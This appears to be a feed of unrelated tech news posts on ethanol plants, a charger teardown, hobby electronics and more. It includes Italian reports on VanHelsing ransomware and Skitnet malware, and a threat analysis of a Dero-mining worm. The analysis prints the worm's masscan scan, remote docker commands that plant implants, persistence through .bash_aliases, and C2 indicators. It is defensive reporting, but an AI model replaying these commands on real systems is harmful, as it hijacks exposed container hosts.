Slurry Time
Ethanol production begins with harvesting corn using combine harvesters. These massive machines cut down dozens of rows of corn at a time, separating the ears from the stalks and feeding them into a threshing drum, where the kernels are freed from the cob. Winnowing fans and sieves separate the chaff and debris from the kernels, which are stored in a tank onboard the combine until they can be transferred to a grain truck for transport to a grain bin for storage and further drying.Corn harvest in progress. You’ve got to burn a lot of diesel to make ethanol. Credit: dvande – stock.adobe.com
Once the corn is properly dried, open-top hopper trucks or train cars transport it to the distillery. The first stop is the scale house, where the cargo is weighed and a small sample of grain is taken from deep within the hopper by a remote-controlled vacuum arm. The sample is transported directly to the scale house for a quick quality assessment, mainly based on moisture content but also the physical state of the kernels. Loads that are too wet, too dirty, or have too many fractured kernels are rejected.
Loads that pass QC are dumped through gates at the bottom of the hoppers into a pit that connects to storage silos via a series of augers and conveyors. Most ethanol plants keep a substantial stock of corn, enough to run the plant for several days in case of any supply disruption. Ethanol plants operate mainly in batch mode, with each batch taking several days to complete, so a large stock ensures the efficiency of continuous operation.The Lakota Green Plains ethanol plant in Iowa. Ethanol plants look a lot like small petroleum refineries and share some of the same equipment. Source: MsEuphonic, CC BY-SA 3.0.
To start a batch of ethanol, corn kernels need to be milled into a fine flour. Corn is fed to a hammer mill, where large steel weights swinging on a flywheel smash the tough pericarp that protects the endosperm and the germ. The starch granules are also smashed to bits, exposing as much surface area as possible. The milled corn is then mixed with clean water to form a slurry, which can be pumped around the plant easily.
The first stop for the slurry is large cooking vats, which use steam to gently heat the mixture and break the starch into smaller chains. The heat also gelatinizes the starch, in a process that’s similar to what happens when a sauce is thickened with a corn starch slurry in the kitchen. The gelatinized starch undergoes liquefaction under heat and mildly acidic conditions, maintained by injecting sulfuric acid or ammonia as needed. These conditions begin hydrolysis of some of the α-1,4 glycosidic bonds, breaking the amylose and amylopectin chains down into shorter fragments called dextrin. An enzyme, α-amylase, is also added at this point to catalyze the α-1,4 bonds to create free glucose monomers. The α-1,6 bonds are cleaved by another enzyme, α-amyloglucosidase.
The Yeast Get Busy
The result of all this chemical and enzymatic action is a glucose-rich mixture ready for fermentation. The slurry is pumped to large reactor vessels where a combination of yeasts is added. Saccharomyces cerevisiae, or brewer’s yeast, is the most common, but other organisms can be used too. The culture is supplemented with ammonia sulfate or urea to provide the nitrogen the growing yeast requires, along with antibiotics to prevent bacterial overgrowth of the culture.
Fermentation occurs at around 30 degrees C over two to three days, while the yeast gorge themselves on the glucose-rich slurry. The glucose is transported into the yeast, where each glucose molecule is enzymatically split into two three-carbon pyruvate molecules. The pyruvates are then broken down into two molecules of acetaldehyde and two of CO2. The two acetaldehyde molecules then undergo a reduction reaction that creates two ethanol molecules. The yeast benefits from all this work by converting two molecules of ADP into two molecules of ATP, which captures the chemical energy in the glucose molecule into a form that can be used to power its metabolic processes, including making more yeast to take advantage of the bounty of glucose.Anaerobic fermentation of one mole of glucose yields two moles of ethanol and two moles of CO2.
After the population of yeast grows to the point where they use up all the glucose, the mix in the reactors, which contains about 12-15% ethanol and is referred to as beer, is pumped into a series of three distillation towers. The beer is carefully heated to the boiling point of ethanol, 78 °C. The ethanol vapors rise through the tower to a condenser, where they change back into the liquid phase and trickle down into collecting trays lining the tower. The liquid distillate is piped to the next two towers, where the same process occurs and the distillate becomes increasingly purer. At the end of the final distillation, the mixture is about 95% pure ethanol, or 190 proof. That’s the limit of purity for fractional distillation, thanks to the tendency of water and ethanol to form an azeotrope, a mixture of two or more liquids that boils at a constant temperature. To drive off the rest of the water, the distillate is pumped into large tanks containing zeolite, a molecular sieve. The zeolite beads have pores large enough to admit water molecules, but too small to admit ethanol. The water partitions into the zeolite, leaving 99% to 100% pure (198 to 200 proof) ethanol behind. The ethanol is mixed with a denaturant, usually 5% gasoline, to make it undrinkable, and pumped into storage tanks to await shipping.
Nothing Goes to Waste
The muck at the bottom of the distillation towers, referred to as whole stillage, still has a lot of valuable material and does not go to waste. The liquid is first pumped into centrifuges to separate the remaining grain solids from the liquid. The solids, called wet distiller’s grain or WDG, go to a rotary dryer, where hot air drives off most of the remaining moisture. The final product is dried distiller’s grain with solubles, or DDGS, a high-protein product used to enrich animal feed. The liquid phase from the centrifuge is called thin stillage, which contains the valuable corn oil from the germ. That’s recovered and sold as an animal feed additive, too.Ethanol fermentation produces mountains of DDGS, or dried distiller’s grain solubles. This valuable byproduct can account for 20% of an ethanol plant’s income. Source: Inside an Ethanol Plant (YouTube).
The final valuable product that’s recovered is the carbon dioxide. Fermentation produces a lot of CO2, about 17 pounds per bushel of feedstock. The gas is tapped off the tops of the fermentation vessels by CO2 scrubbers and run through a series of compressors and coolers, which turn it into liquid carbon dioxide. This is sold off by the tanker-full to chemical companies, food and beverage manufacturers, who use it to carbonate soft drinks, and municipal water treatment plants, where it’s used to balance the pH of wastewater.
There are currently 187 fuel ethanol plants in the United States, most of which are located in the Midwest’s corn belt, for obvious reasons. Together, these plants produced more than 16 billion gallons of ethanol in 2024. Since each bushel of corn yields about 3 gallons of ethanol, that translates to an astonishing 5 billion bushels of corn used for fuel production, or about a third of the total US corn production.
VanHelsing Ransomware: il codice sorgente trapelato rivela segreti sconcertanti
Il codice sorgente del pannello affiliato del malware VanHelsing RaaS (ransomware-as-a-service) è stato reso di pubblico dominio. Non molto tempo prima, l’ex sviluppatore aveva provato a vendere il codice sorgente sul forum di hacking RAMP.
Il ransomware VanHelsing è stato lanciato nel marzo 2025 e i suoi creatori hanno affermato che era in grado di attaccare sistemi basati su Windows, Linux, BSD, ARM ed ESXi. Secondo Ransomware.live, da allora almeno otto vittime sono state preda di attacchi ransomware.
All’inizio di questa settimana, qualcuno che utilizzava il nickname th30c0der ha tentato di vendere sul darknet il codice sorgente del pannello e dei siti affiliati di VanHelsing, nonché build di ransomware per Windows e Linux. Il prezzo sarebbe stato determinato da una asta, con un’offerta iniziale di 10.000 dollari.
“Vendita del codice sorgente del ransomware vanhelsing: chiavi TOR incluse + pannello di amministrazione web + chat + file server + blog, inclusi tutti i database”, ha scritto th30c0der sul forum di hacking RAMP.
Secondo il ricercatore di sicurezza informatica Emanuele De Lucia, gli operatori di VanHelsing hanno deciso di anticipare il venditore e hanno pubblicato loro stessi il codice sorgente del ransomware. Hanno anche affermato che th30c0der è uno dei loro ex sviluppatori di malware che cerca di truffare la gente e vendere vecchi codici sorgente.
“Oggi annunciamo che pubblicheremo i vecchi codici sorgente e che presto pubblicheremo una nuova e migliorata versione del locker (VanHelsing 2.0)”, hanno affermato gli operatori di VanHelsing su RAMP.
In risposta a ciò, th30c0der ha affermato che le sue informazioni sono più complete, poiché gli sviluppatori di VanHelsing non hanno pubblicato il Linux Builder né alcun database, il che potrebbe essere particolarmente utile per le forze dell’ordine e i ricercatori sulla sicurezza informatica.
I giornalisti della rivista Bleeping Computer hanno studiato i codici sorgente pubblicati e hanno confermato che contengono un vero e proprio builder per la versione Windows del malware, nonché il codice sorgente per il pannello di affiliazione e il sito per il “drenaggio” dei dati.
Secondo i ricercatori, il codice sorgente del builder è un pasticcio e i file di Visual Studio si trovano nella cartella Release, solitamente utilizzata per archiviare i file binari compilati e gli artefatti di build.
Si noti inoltre che l’utilizzo del generatore VanHelsing richiede un po’ di lavoro aggiuntivo, poiché si connette al pannello di affiliazione all’indirizzo 31.222.238[.]208 per recuperare i dati. Considerando che il dump contiene il codice sorgente del pannello in cui si trova l’endpoint api.php, gli aggressori possono modificare il codice o eseguire la propria versione del pannello per far funzionare il builder.
Inoltre, l’archivio pubblicato contiene il codice sorgente del ransomware per Windows, che può essere utilizzato per creare una build, un decryptor e un loader autonomi.
Tra le altre cose, la pubblicazione rileva che gli aggressori, a quanto pare, hanno tentato di creare un blocco MBR che avrebbe sostituito il master boot record con un bootloader personalizzato che avrebbe visualizzato un messaggio relativo al blocco.
L'articolo VanHelsing Ransomware: il codice sorgente trapelato rivela segreti sconcertanti proviene da il blog della sicurezza informatica.
A Look Inside a Lemon of a Race Car
Automotive racing is a grueling endeavor, a test of one’s mental and physical prowess to push an engineered masterpiece to its limit. This is all the more true of 24 hour endurance races where teams tag team to get the most laps of a circuit in over a 24 hour period. The format pushes cars and drivers to the very limit. Doing so on a $500 budget as presented by the 24 hours of Lemons makes this all the more impressive!
Of course, racing on a $500 budget is difficult to say the least. All the expected Fédération Internationale de l’Automobile (FIA) safety requirements are still in place, including roll cage, seats and fire extinguisher. However, brakes, wheels, tires and safety equipment are not factored into the cost of the car, which is good because an FIA racing seat can run well in excess of the budget. Despite the name, most races are twelve to sixteen hours across two days, but 24 hour endurance races are run. The very limiting budget and amateur nature of the event has created a large amount of room for teams to get creative with car restorations and race car builds.
The 24 Hours of Le-MINES Team and their 1990 Miata
One such team we had the chance of speaking to goes by the name 24 Hours of Le-Mines. Their build is a wonderful mishmash of custom fabrication and affordable parts. It’s built from a restored 1999 NA Miata complete with rusted frame and all! Power is handled by a rebuilt 302 Mustang engine of indeterminate age.
The stock Miata brakes seem rather small for a race car, but are plenty for a car of its weight. Suspension is an Amazon special because it only has to work for 24 hours. The boot lid (or trunk if you prefer) is held down with what look to be over-sized RC car pins. Nestled next to the PVC pipe inlet pipe is a nitrous oxide canister — we don’t know if it’s functional or for show, but we like it nonetheless. The scrappy look is completed with a portion of the road sign fabricated into a shifter cover.
The team is unsure if the car will end up racing, but odds are if you are reading Hackaday, you care more about the race cars then the actual racing. Regardless, we hope to see this Miata in the future!
This is certainly not the first time we have covered 24 hour endurance engineering, like this solar powered endurance plane.
Dero miner zombies biting through Docker APIs to build a cryptojacking horde
Introduction
Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API, and bites exploits it by creating new malicious containers and compromising the running ones, thus transforming them into new “zombies” that will mine for Dero currency and continue “biting” new victims. No command-and-control server is required for the delivery, just an exponentially growing number of victims that are automatically infecting new ones. That’s exactly what the new Dero mining campaign does.
During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector:
The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx
and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts:
- nginx:
Trojan.Linux.Agent.gen
; - Dero crypto miner:
RiskTool.Linux.Miner.gen
.
nginx: the propagation malware
This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx
ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet.
The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”.
After unpacking the nginx
malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.
Infecting the container
The malware starts by creating a log file at “/var/log/nginx.log”.
This log file will be used later to log the running activities of the malware, including data like the list of infected machines, the names of created malicious containers on those machines, and the exit status code if there were any errors.
After that, in a new process, a function called main.checkVersion
loops infinitely to make sure that the content of a file located at “/usr/bin/version.dat” inside the compromised container always equals 1.4
. If the file contents were changed, this function overwrites them.
Ensuring that version.dat exists and contains 1.4
If version.dat
doesn’t exist, the malicious function creates this file with the content 1.4
, then sleeps for 24 hours before the next iteration.
Creating version.dat if it doesn’t exist
The malware uses the version.dat
file to identify the already infected containers, which we’ll describe later.
The nginx
sample then executes the main.monitorCloudProcess
function that loops infinitely in a new process making sure that a process named cloud
, which is a Dero miner, is running. First, the malware checks whether or not the cloud
process is running. If it’s not, nginx
executes the main.startCloudProcess
function to launch the miner.
Monitoring and executing the cloud process
In order to execute the miner, the main.startCloudProcess
function attempts to locate it at “/usr/bin/cloud”.
Spreading the infection
Host search
Next, the nginx
malware will go into an infinite loop of generating random IPv4 /16 network subnets to scan them and compromise more networks with the main.generateRandomSubnet
function.
Infinite loop of network subnets generation and scanning
The subnets with the respective IP ranges will be passed to the main.scanSubnet
function to be scanned via masscan, a port scanning tool installed in the container by the malware, which we will describe in more detail later. The scanner is looking for an insecure Docker API published on the internet to exploit by scanning the generated subnet via the following command: masscan -p 2375 -oL – –max-rate 360
.
Scanning the generated subnet via masscan
The output of masscan is parsed via regex to extract the IPv4s that have the default Docker API port 2375 open. Then the extracted IPv4s are passed to the main.checkDockerDaemon
function. It checks if the remote dockerd daemon on the host with a matching IPv4 is running and responsive. To do this, the malware attempts to list all running containers on the remote host by executing a docker -H PS
command. If it fails, nginx
proceeds to check the next IPv4.
Remotely listing running containers
Container creation
After confirming that the remote dockerd daemon is running and responsive, nginx
generates a container name with 12 random characters and uses it to create a malicious container on the remote target.
The malicious container is created with docker -H run -dt –name –restart always ubuntu:18.04 /bin/bash
. The malware uses a –restart always
flag to start the newly created containers automatically when they exit.
Malicious container created on a new host
Then nginx
prepares the new container to install dependencies later by updating the packages via docker -H exec apt-get -yq update
.
Next, the malicious sample uses a docker -H exec apt-get install -yq masscan docker.io
command to install masscan and docker.io in the container, which are dependencies for the malware to interact with the Docker daemon and to perform the external scan to infect other networks.
Remotely installing the malware dependencies inside the newly created container
Then it transfers the two malicious implants, nginx
and cloud
, to the container by executing docker -H cp -L /usr/bin/ :/usr/bin
.
Transferring nginx and cloud to the newly created container
The malware maintains persistence by adding the transferred nginx
binary to /root/.bash_aliases
to make sure that it will automatically execute upon shell login. This is done via a docker -H exec bash –norc -c \'echo \"/usr/bin/nginx &\" > /root/.bash_aliases\'
command.
Adding the nginx malware to .bash_aliases for persistence
Compromising running containers
Up until this point, the malware has only created new malicious containers. Now, it will try to compromise the ubuntu:18.04-based running containers. The sample first executes the main.checkAndOperateContainers
function to check all the running containers on the remote vulnerable host for two conditions: the container has an ubuntu:18.04-base and it doesn’t contain a version.dat
file, which is an indicator that the container had been previously infected.
Listing and compromising existing containers on the remote target
If these conditions are satisfied, the malware executes the main.operateOnContainer
function to proceed with the same attack vector described earlier to infect the running container. The infection chain is repeated, hijacking the container resources to scan and compromise more containers and mining for the Dero cryptocurrency.
That way, the malware does not require a C2 connection and also maintains its activity as long as there is an insecurely published Docker API that can be exploited to compromise running containers and create new ones.
cloud – the Dero miner
Executing and maintaining cloud
, the crypto miner, is the primary goal of the nginx
sample. The miner is also written in Golang and packed with UPX. After unpacking the binary, we were able to attribute it to the open-source DeroHE CLI miner project found on GitHub. The threat actor wrapped the DeroHE CLI miner into the cloud
malware, with a hardcoded mining configuration: a wallet address and a DeroHE node (derod) address.
If no addresses were passed as arguments, which is the case in this campaign, the cloud
malware uses the hardcoded encrypted configuration as the default configuration. It is stored as a Base64-encoded string that, after decoding, results in an AES-CTR encrypted blob of a Base64-encoded wallet address, which is decrypted with the main.decrypt
function. The configuration encryption indicates that the threat actors attempt to sophisticate the malware, as we haven’t seen this in previous campaigns.
Decrypting the crypto wallet address
Upon decoding this string, we uncovered the wallet address in clear text: dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y
.
Behavioral analysis of the decryption function
Then the malware decrypts another two hardcoded AES-CTR encrypted strings to get the dero node addresses via a function named main.sockz
.
Function calls to decrypt the addresses
The node addresses are encrypted the same way the wallet address is, but with other keys. After decryption, we were able to obtain the following addresses: d.windowsupdatesupport[.]link
and h.wiNdowsupdatesupport[.]link
.
The same wallet address and the derod node addresses had been observed before in a campaign that targeted Kubernetes clusters with Kubernetes API anonymous authentication enabled. Instead of transferring the malware to a compromised container, the threat actor pulls a malicious image named pauseyyf/pause:latest
, which is published on Docker Hub and contains the miner. This image was used to create the malicious container. Unlike the current campaign, the attack vector was meant to be stealthy as threat actors didn’t attempt to move laterally or scan the internet to compromise more networks. These attacks were seen throughout 2023 and 2024 with minor changes in techniques.
Takeaways
Although attacks on containers are less frequent than on other systems, they are not less dangerous. In the case we analyzed, containerized environments were compromised through a combination of a previously known miner and a new sample that created malicious containers and infected existing ones. The two malicious implants spread without a C2 server, making any network that has a containerized infrastructure and insecurely published Docker API to the internet a potential target.
Analysis of Shodan shows that in April 2025, there were 520 published Docker APIs over port 2375 worldwide. It highlights the potential destructive consequences of the described threat and emphasizes the need for thorough monitoring and container protection.
Docker APIs published over port 2375 ports worldwide, January–April 2025 (download)
Building your containerized infrastructure from known legitimate images alone doesn’t guarantee security. Just like any other system, containerized applications can be compromised at runtime, so it’s crucial to monitor your containerized infrastructure with efficient monitoring tools like Kaspersky Container Security. It detects misconfigurations and monitors registry images, ensuring the safety of container environments. We also recommend proactively hunting for threats to detect stealthy malicious activities and incidents that might have slipped unnoticed on your network. The Kaspersky Compromise Assessment service can help you not only detect such incidents, but also remediate them and provide immediate and effective incident response activities.
Indicators of compromise
File hashes
094085675570A18A9225399438471CC9 nginx
14E7FB298049A57222254EF0F47464A7 cloud
File paths
NOTE: Certain file path IoCs may lead to false positives due to the masquerading technique used.
/usr/bin/nginx
/usr/bin/cloud
/var/log/nginx.log
/usr/bin/version.dat
Derod nodes addresses
d.windowsupdatesupport[.]link
h.wiNdowsupdatesupport[.]link
Dero wallet address
dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y
Fault Analysis of a 120W Anker GaNPrime Charger
Taking a break from his usual prodding at suspicious AliExpress USB chargers, [DiodeGoneWild] recently had a gander at what used to be a good USB charger.The Anker 737 USB charger prior to its autopsy.
Before it went completely dead, the Anker 737 GaNPrime USB charger which a viewer sent him was capable of up to 120 Watts combined across its two USB-C and one USB-A outputs. Naturally the charger’s enclosure couldn’t be opened non-destructively, and it turned out to have (soft) potting compound filling up the voids, making it a treat to diagnose. Suffice it to say that these devices are not designed to be repaired.
With it being an autopsy, the unit got broken down into the individual PCBs, with a short detected that eventually got traced down to an IC marked ‘SW3536’, which is one of the ICs that communicates with the connected USB device to negotiate the voltage. With the one IC having shorted, it appears that it rendered the entire charger into an expensive paperweight.
Since the charger was already in pieces, the rest of the circuit and its ICs were also analyzed. Here the gallium nitride (GaN) part was found in the Navitas GaNFast NV6136A FET with integrated gate driver, along with an Infineon CoolGaN IGI60F1414A1L integrated power stage. Unfortunately all of the cool technology was rendered useless by one component developing a short, even if it made for a fascinating look inside one of these very chonky USB chargers.
youtube.com/embed/-JV5VGO55-I?…
Skitnet: Il Malware che Sta Conquistando il Mondo del Ransomware
Gli esperti hanno lanciato l’allarme: i gruppi ransomware stanno utilizzando sempre più spesso il nuovo malware Skitnet (noto anche come Bossnet) per lo sfruttamento successivo delle reti compromesse.
Secondo gli analisti di Prodaft, il malware è stato pubblicizzato sui forum di hacking dall’aprile 2024 e ha iniziato a guadagnare popolarità tra gli estorsori all’inizio del 2025. Ad esempio, Skitnet è già stato utilizzato negli attacchi degli operatori di BlackBasta e Cactus.
Un’infezione da Skitnet inizia con l’esecuzione di un loader scritto in Rust sul computer di destinazione, che decifra il binario Nim crittografato con ChaCha20 e lo carica nella memoria. Il payload Nim crea una reverse shell basata su DNS per comunicare con il server C&C, avviando una sessione utilizzando query DNS casuali.
Il malware avvia quindi tre thread: uno per inviare richieste di segnalazione DNS, un altro per monitorare ed estrarre l’output della shell e un altro per ascoltare e decifrare i comandi dalle risposte DNS.
I messaggi e i comandi da eseguire vengono inviati tramite HTTP o DNS in base ai comandi inviati tramite il pannello di controllo Skitnet. In questo pannello, l’operatore può visualizzare l’indirizzo IP del target, la sua posizione, il suo stato e inviare comandi per l’esecuzione.
Il malware supporta i seguenti comandi:
- Start: si insinua nel sistema scaricando tre file (tra cui una DLL dannosa) e creando un collegamento al file eseguibile legittimo Asus (ISP.exe) nella cartella di avvio. Ciò attiva un hook DLL che esegue lo script PowerShell pas.ps1 per comunicare continuamente con il server C&C;
- Screen: tramite PowerShell, viene acquisito uno screenshot del desktop della vittima, caricato su Imgur e quindi l’URL dell’immagine viene inviato al server C&C;
- Anydesk : scarica e installa in modo silenzioso lo strumento di accesso remoto AnyDesk, nascondendone la finestra e l’icona nella barra delle applicazioni;
- Rutserv : scarica e installa in modo silenzioso lo strumento di accesso remoto RUT-Serv;
- Shell : esegue un ciclo di comandi PowerShell. Invia un messaggio iniziale “Shell running…”, quindi interroga il server ogni 5 secondi per nuovi comandi, che vengono eseguiti utilizzando Invoke-Expression, e quindi i risultati vengono inviati indietro;
- Av — elenca i software antivirus e di sicurezza installati sul computer tramite query WMI (SELECT * FROM AntiVirusProduct nello spazio dei nomi root\SecurityCenter2). I risultati vengono inviati al server di controllo.
Oltre a questi comandi, gli operatori di Skitnet possono sfruttare le funzionalità del loader .NET, che consente l’esecuzione di script PowerShell in memoria per personalizzare ulteriormente gli attacchi.
Gli esperti sottolineano che, sebbene i gruppi estorsivi utilizzino spesso strumenti propri, adattati per operazioni specifiche e difficili da rilevare da parte degli antivirus, il loro sviluppo non è economico e richiede il coinvolgimento di sviluppatori qualificati, non sempre disponibili.
Utilizzare malware standard come Skitnet è più economico, consente una distribuzione più rapida e rende più difficile l’attribuzione perché il malware è utilizzato da molti aggressori.
I ricercatori di Prodaft hanno pubblicato su GitHub degli indicatori di compromissione relativi a Skitnet.
C2 servers
github.com/prodaft/malware-ioc…
109.120.179.170
178.236.247.7
181.174.164.47
181.174.164.41
181.174.164.4
181.174.164.240
181.174.164.2
181.174.164.180
181.174.164.140
181.174.164.107
181.174.164.238
L'articolo Skitnet: Il Malware che Sta Conquistando il Mondo del Ransomware proviene da il blog della sicurezza informatica.
The Mouse Language, Running on Arduino
Although plenty of us have our preferred language for coding, whether it’s C for its hardware access, Python for its usability, or Fortran for its mathematic prowess, not every language is specifically built for problem solving of a particular nature. Some are built as thought experiments or challenges, like Whitespace or Chicken but aren’t used for serious programming. There are a few languages that fit in the gray area between these regions, and one example of this is the language MOUSE which can now be run on an Arduino.
Although MOUSE was originally meant to be a minimalist language for computers of the late 70s and early 80s with limited memory (even for the era), its syntax looks more like a more modern esoteric language, and indeed it arguably would take a Python developer a bit of time to get used to it in a similar way. It’s stack-based, for a start, and also uses Reverse Polish notation for performing operations. The major difference though is that programs process single letters at a time, with each letter corresponding to a specific instruction. There have been some changes in the computing world since the 80s, though, so [Ivan]’s version of MOUSE includes a few changes that make it slightly different than the original language, but in the end he fits an interpreter, a line editor, graphics primitives, and peripheral drivers into just 2KB of SRAM and 32KB Flash so it can run on an ATmega328P.
There are some other features here as well, including support for PS/2 devices, video output, and the ability to save programs to the internal EEPROM. It’s an impressive setup for a language that doesn’t get much attention at all, but certainly one that threads the needle between usefulness and interesting in its own right. Of course if a language where “Hello world” is human-readable is not esoteric enough, there are others that may offer more of a challenge.
Plugging Plasma Leaks in Magnetic Confinement With New Guiding Center Model
Although the idea of containing a plasma within a magnetic field seems straightforward at first, plasmas are highly dynamic systems that will happily escape magnetic confinement if given half a chance. This poses a major problem in nuclear fusion reactors and similar, where escaping particles like alpha (helium) particles from the magnetic containment will erode the reactor wall, among other issues. For stellarators in particular the plasma dynamics are calculated as precisely as possible so that the magnetic field works with rather than against the plasma motion, with so far pretty good results.
Now researchers at the University of Texas reckon that they can improve on these plasma system calculations with a new, more precise and efficient method. Their suggested non-perturbative guiding center model is published in (paywalled) Physical Review Letters, with a preprint available on Arxiv.
The current perturbative guiding center model admittedly works well enough that even the article authors admit to e.g. Wendelstein 7-X being within a few % of being perfectly optimized. While we wouldn’t dare to take a poke at what exactly this ‘data-driven symmetry theory’ approach exactly does differently, it suggests the use machine-learning based on simulation data, which then presumably does a better job at describing the movement of alpha particles through the magnetic field than traditional simulations.
Top image: Interior of the Wendelstein 7-X stellarator during maintenance.
Working On Open-Source High-Speed Ethernet Switch
Our hacker [Andrew Zonenberg] reports in on his open-source high-speed Ethernet switch. He hasn’t finished yet, but progress has been made.
If you were wondering what might be involved in a high-speed Ethernet switch implementation look no further. He’s been working on this project, on and off, since 2012. His design now includes a dizzying array of parts. [Andrew] managed to snag some XCKU5P FPGAs for cheap, paying two cents in the dollar, and having access to this fairly high-powered hardware affected the project’s direction.
You might be familiar with [Andrew Zonenberg] as we have heard from him before. He’s the guy who gave us the glscopeclient, which is now ngscopeclient.
As perhaps you know, when he says in his report that he is an “experienced RTL engineer”, he is talking about Register-Transfer Level, which is an abstraction layer used by hardware description languages, such as Verilog and VHDL, which are used to program FPGAs. When he says “RTL” he’s not talking about Resistor-Transistor Logic (an ancient method of developing digital hardware) or the equally ancient line of Realtek Ethernet controllers such as the RTL8139.
When it comes to open-source software you can usually get a copy at no cost. With open-source hardware, on the other hand, you might find yourself needing to fork out for some very expensive bits of kit. High speed is still expensive! And… proprietary, for now. If you’re looking to implement Ethernet hardware today, you will have to stick with something slower. Otherwise, stay tuned, and watch this space.
Stylus Synth Should Have Used a 555– and Did!
For all that “should have used a 555” is a bit of a meme around here, there’s some truth to it. The humble 555 is a wonderful tool in the right hands. That’s why it’s wonderful to see this all-analog stylus synth project by EE student [DarcyJ] bringing the 555 out for the new generation.
The project is heavily inspired by the vintage stylophone, but has some neat tweaks. A capacitor bank means multiple octaves are available, and using a ladder of trim pots instead of fixed resistors makes every note tunable. [Darcy] of course included the vibrato function of the original, and yes, he used a 555 for that, too. He put a trim pot on that, too, to control the depth of vibrato, which we don’t recall seeing on the original stylophone.
The writeup is very high quality and could be recommended to anyone just getting started in analog (or analogue) electronics– not only does [Darcy] explain his design process, he also shows his pratfalls and mistakes, like in the various revisions he went through before discovering the push-pull amplifier that ultimately powers the speaker.
Since each circuit is separately laid out and indicated on the PCB [Darcy] designed in KiCad for this project. Between that and everything being thru-hole, it seems like [Darcy] has the makings of a lovely training kit. If you’re interested in rolling your own, the files are on GitHub under a CERN-OHL-S v2 license, and don’t forget to check out the demo video embedded below to hear it in action.
Of course, making music on the 555 is hardly a new hack. We’ve seen everything from accordions to paper-tape player pianos to squonkboxes over the years. Got another use for the 555? Let us know about it, in the inevitable shill for our tip line you all knew was coming.
youtube.com/embed/EBShBqbxInw?…
As The World Burns, At least You’ll Have Secure Messaging
There’s a section of our community who concern themselves with the technological aspects of preparing for an uncertain future, and for them a significant proportion of effort goes in to communication. This has always included amateur radio, but in more recent years it has been extended to LoRa. To that end, [Bertrand Selva] has created a LoRa communicator, one which uses a Pi Pico, and delivers secure messaging.
The hardware is a rather-nice looking 3D printed case with a color screen and a USB A port for a keyboard, but perhaps the way it works is more interesting. It takes a one-time pad approach to encryption, using a key the same length as the message. This means that an intercepted message is in effect undecryptable without the key, but we are curious about the keys themselves.
They’re a generated list of keys stored on an SD card with a copy present in each terminal on a particular net of devices, and each key is time-specific to a GPS derived time. Old keys are destroyed, but we’re interested in how the keys are generated as well as how such a system could be made to survive the loss of one of those SD cards. We’re guessing that just as when a Cold War spy had his one-time pad captured, that would mean game over for the security.
So if Meshtastic isn’t quite the thing for you then it’s possible that this could be an alternative. As an aside we’re interested to note that it’s using a 433 MHz LoRa module, revealing the different frequency preferences that exist between enthusiasts in different countries.
youtube.com/embed/R846vWyKoqg?…
The Make-roscope
Normal people binge-scroll social media. Hackaday writers tend to pore through online tech news and shopping sites incessantly. The problem with the shopping sites is that you wind up buying things, and then you have even more projects you don’t have time to do. That’s how I found the MAKE-roscope, an accessory aimed at kids that turns a cell phone into a microscope. While it was clearly trying to appeal to kids, I’ve had some kids’ microscopes that were actually useful, and for $20, I decided to see what it was about. If nothing else, the name made it appealing.
My goal was to see if it would be worth having for the kinds of things we do. Turns out, I should have read more closely. It isn’t really going to help you with your next PCB or to read that tiny print on an SMD part. But it is interesting, and — depending on your interests — you might enjoy having one. The material claims the scope can magnify from 125x to 400x.
What Is It?
A microscope in a tin. Just add a cell phone or tablet
The whole thing is in an unassuming Altoids-like tin. Inside the box are mostly accessories you may or may not need, like a lens cloth, a keychain, plastic pipettes, and the like. There are only three really interesting things: A strip of silicone with a glass ball in it, and a slide container with five glass slides, three of which have something already on them. There’s also a spare glass ball (the lens).
What I didn’t find in my box were cover slips, any way to prepare specimens, and — perhaps most importantly — clear instructions. There are some tiny instructions on the back of the tin and on the lens cloth paper. There is also a QR code, but to really get going, I had to watch a video (embedded below).
youtube.com/embed/Td62kPb24tU?…
What I quickly realized is that this isn’t a metalurgical scope that takes images of things. It is a transmissive microscope like you find in a biology lab. Normally, the light in a scope like that goes up through the slide and into the objective. This one is upside down. The light comes from the top, through the slide, and into the glass ball lens.
Bio Scopes Can Be Fun
Of course, if you have an interest in biology or thin films or other things that need that kind of microscope, this could be interesting. After all, cell phones sometimes have macro modes that you can use as a pretty good low-power microscope already if you want to image a part or a PCB. You can also find lots of lenses that attach to the phone if you need them. But this is a traditional microscope, which is a bit different.
The silicone compresses, which seems to be the real trick. Here’s how it works in practice. You turn on your camera and switch to the selfie lens. Then you put the silicone strip over the camera and move it around. You’ll see that the lens makes a “spotlight” in the image when it is in the right place. Get it centered and zoom until you can’t see the circle of the lens anymore.
Then you put your slide down on the lens and move it around until you get an image. It might be a little fuzzy. That’s where the silicone comes in. You push down, and the image will snap into focus. The hardest part is pushing down while holding it still and pushing the shutter button.
Zeiss and Nikon don’t have anything to worry about, but the images are just fine. You can grab a drop of water or swab your cheek. It would have been nice to have some stain and either some way to microtome samples, or at least instructions on how you might do that with household items.
Verdict
For most electronics tasks, you are better off with a loupe, magnifiers, a zoomed cell phone, or a USB microscope. But if you want a traditional microscope for science experiments or to foster a kid’s interest in science, it might be worth something.
For electronics, you are better off with a metallurgical scope. Soldering under a stereoscope is life-changing. We’ve seen more expensive versions of this, too, but we aren’t sure they are much better.
When Repairs Go Inside Integrated Circuits
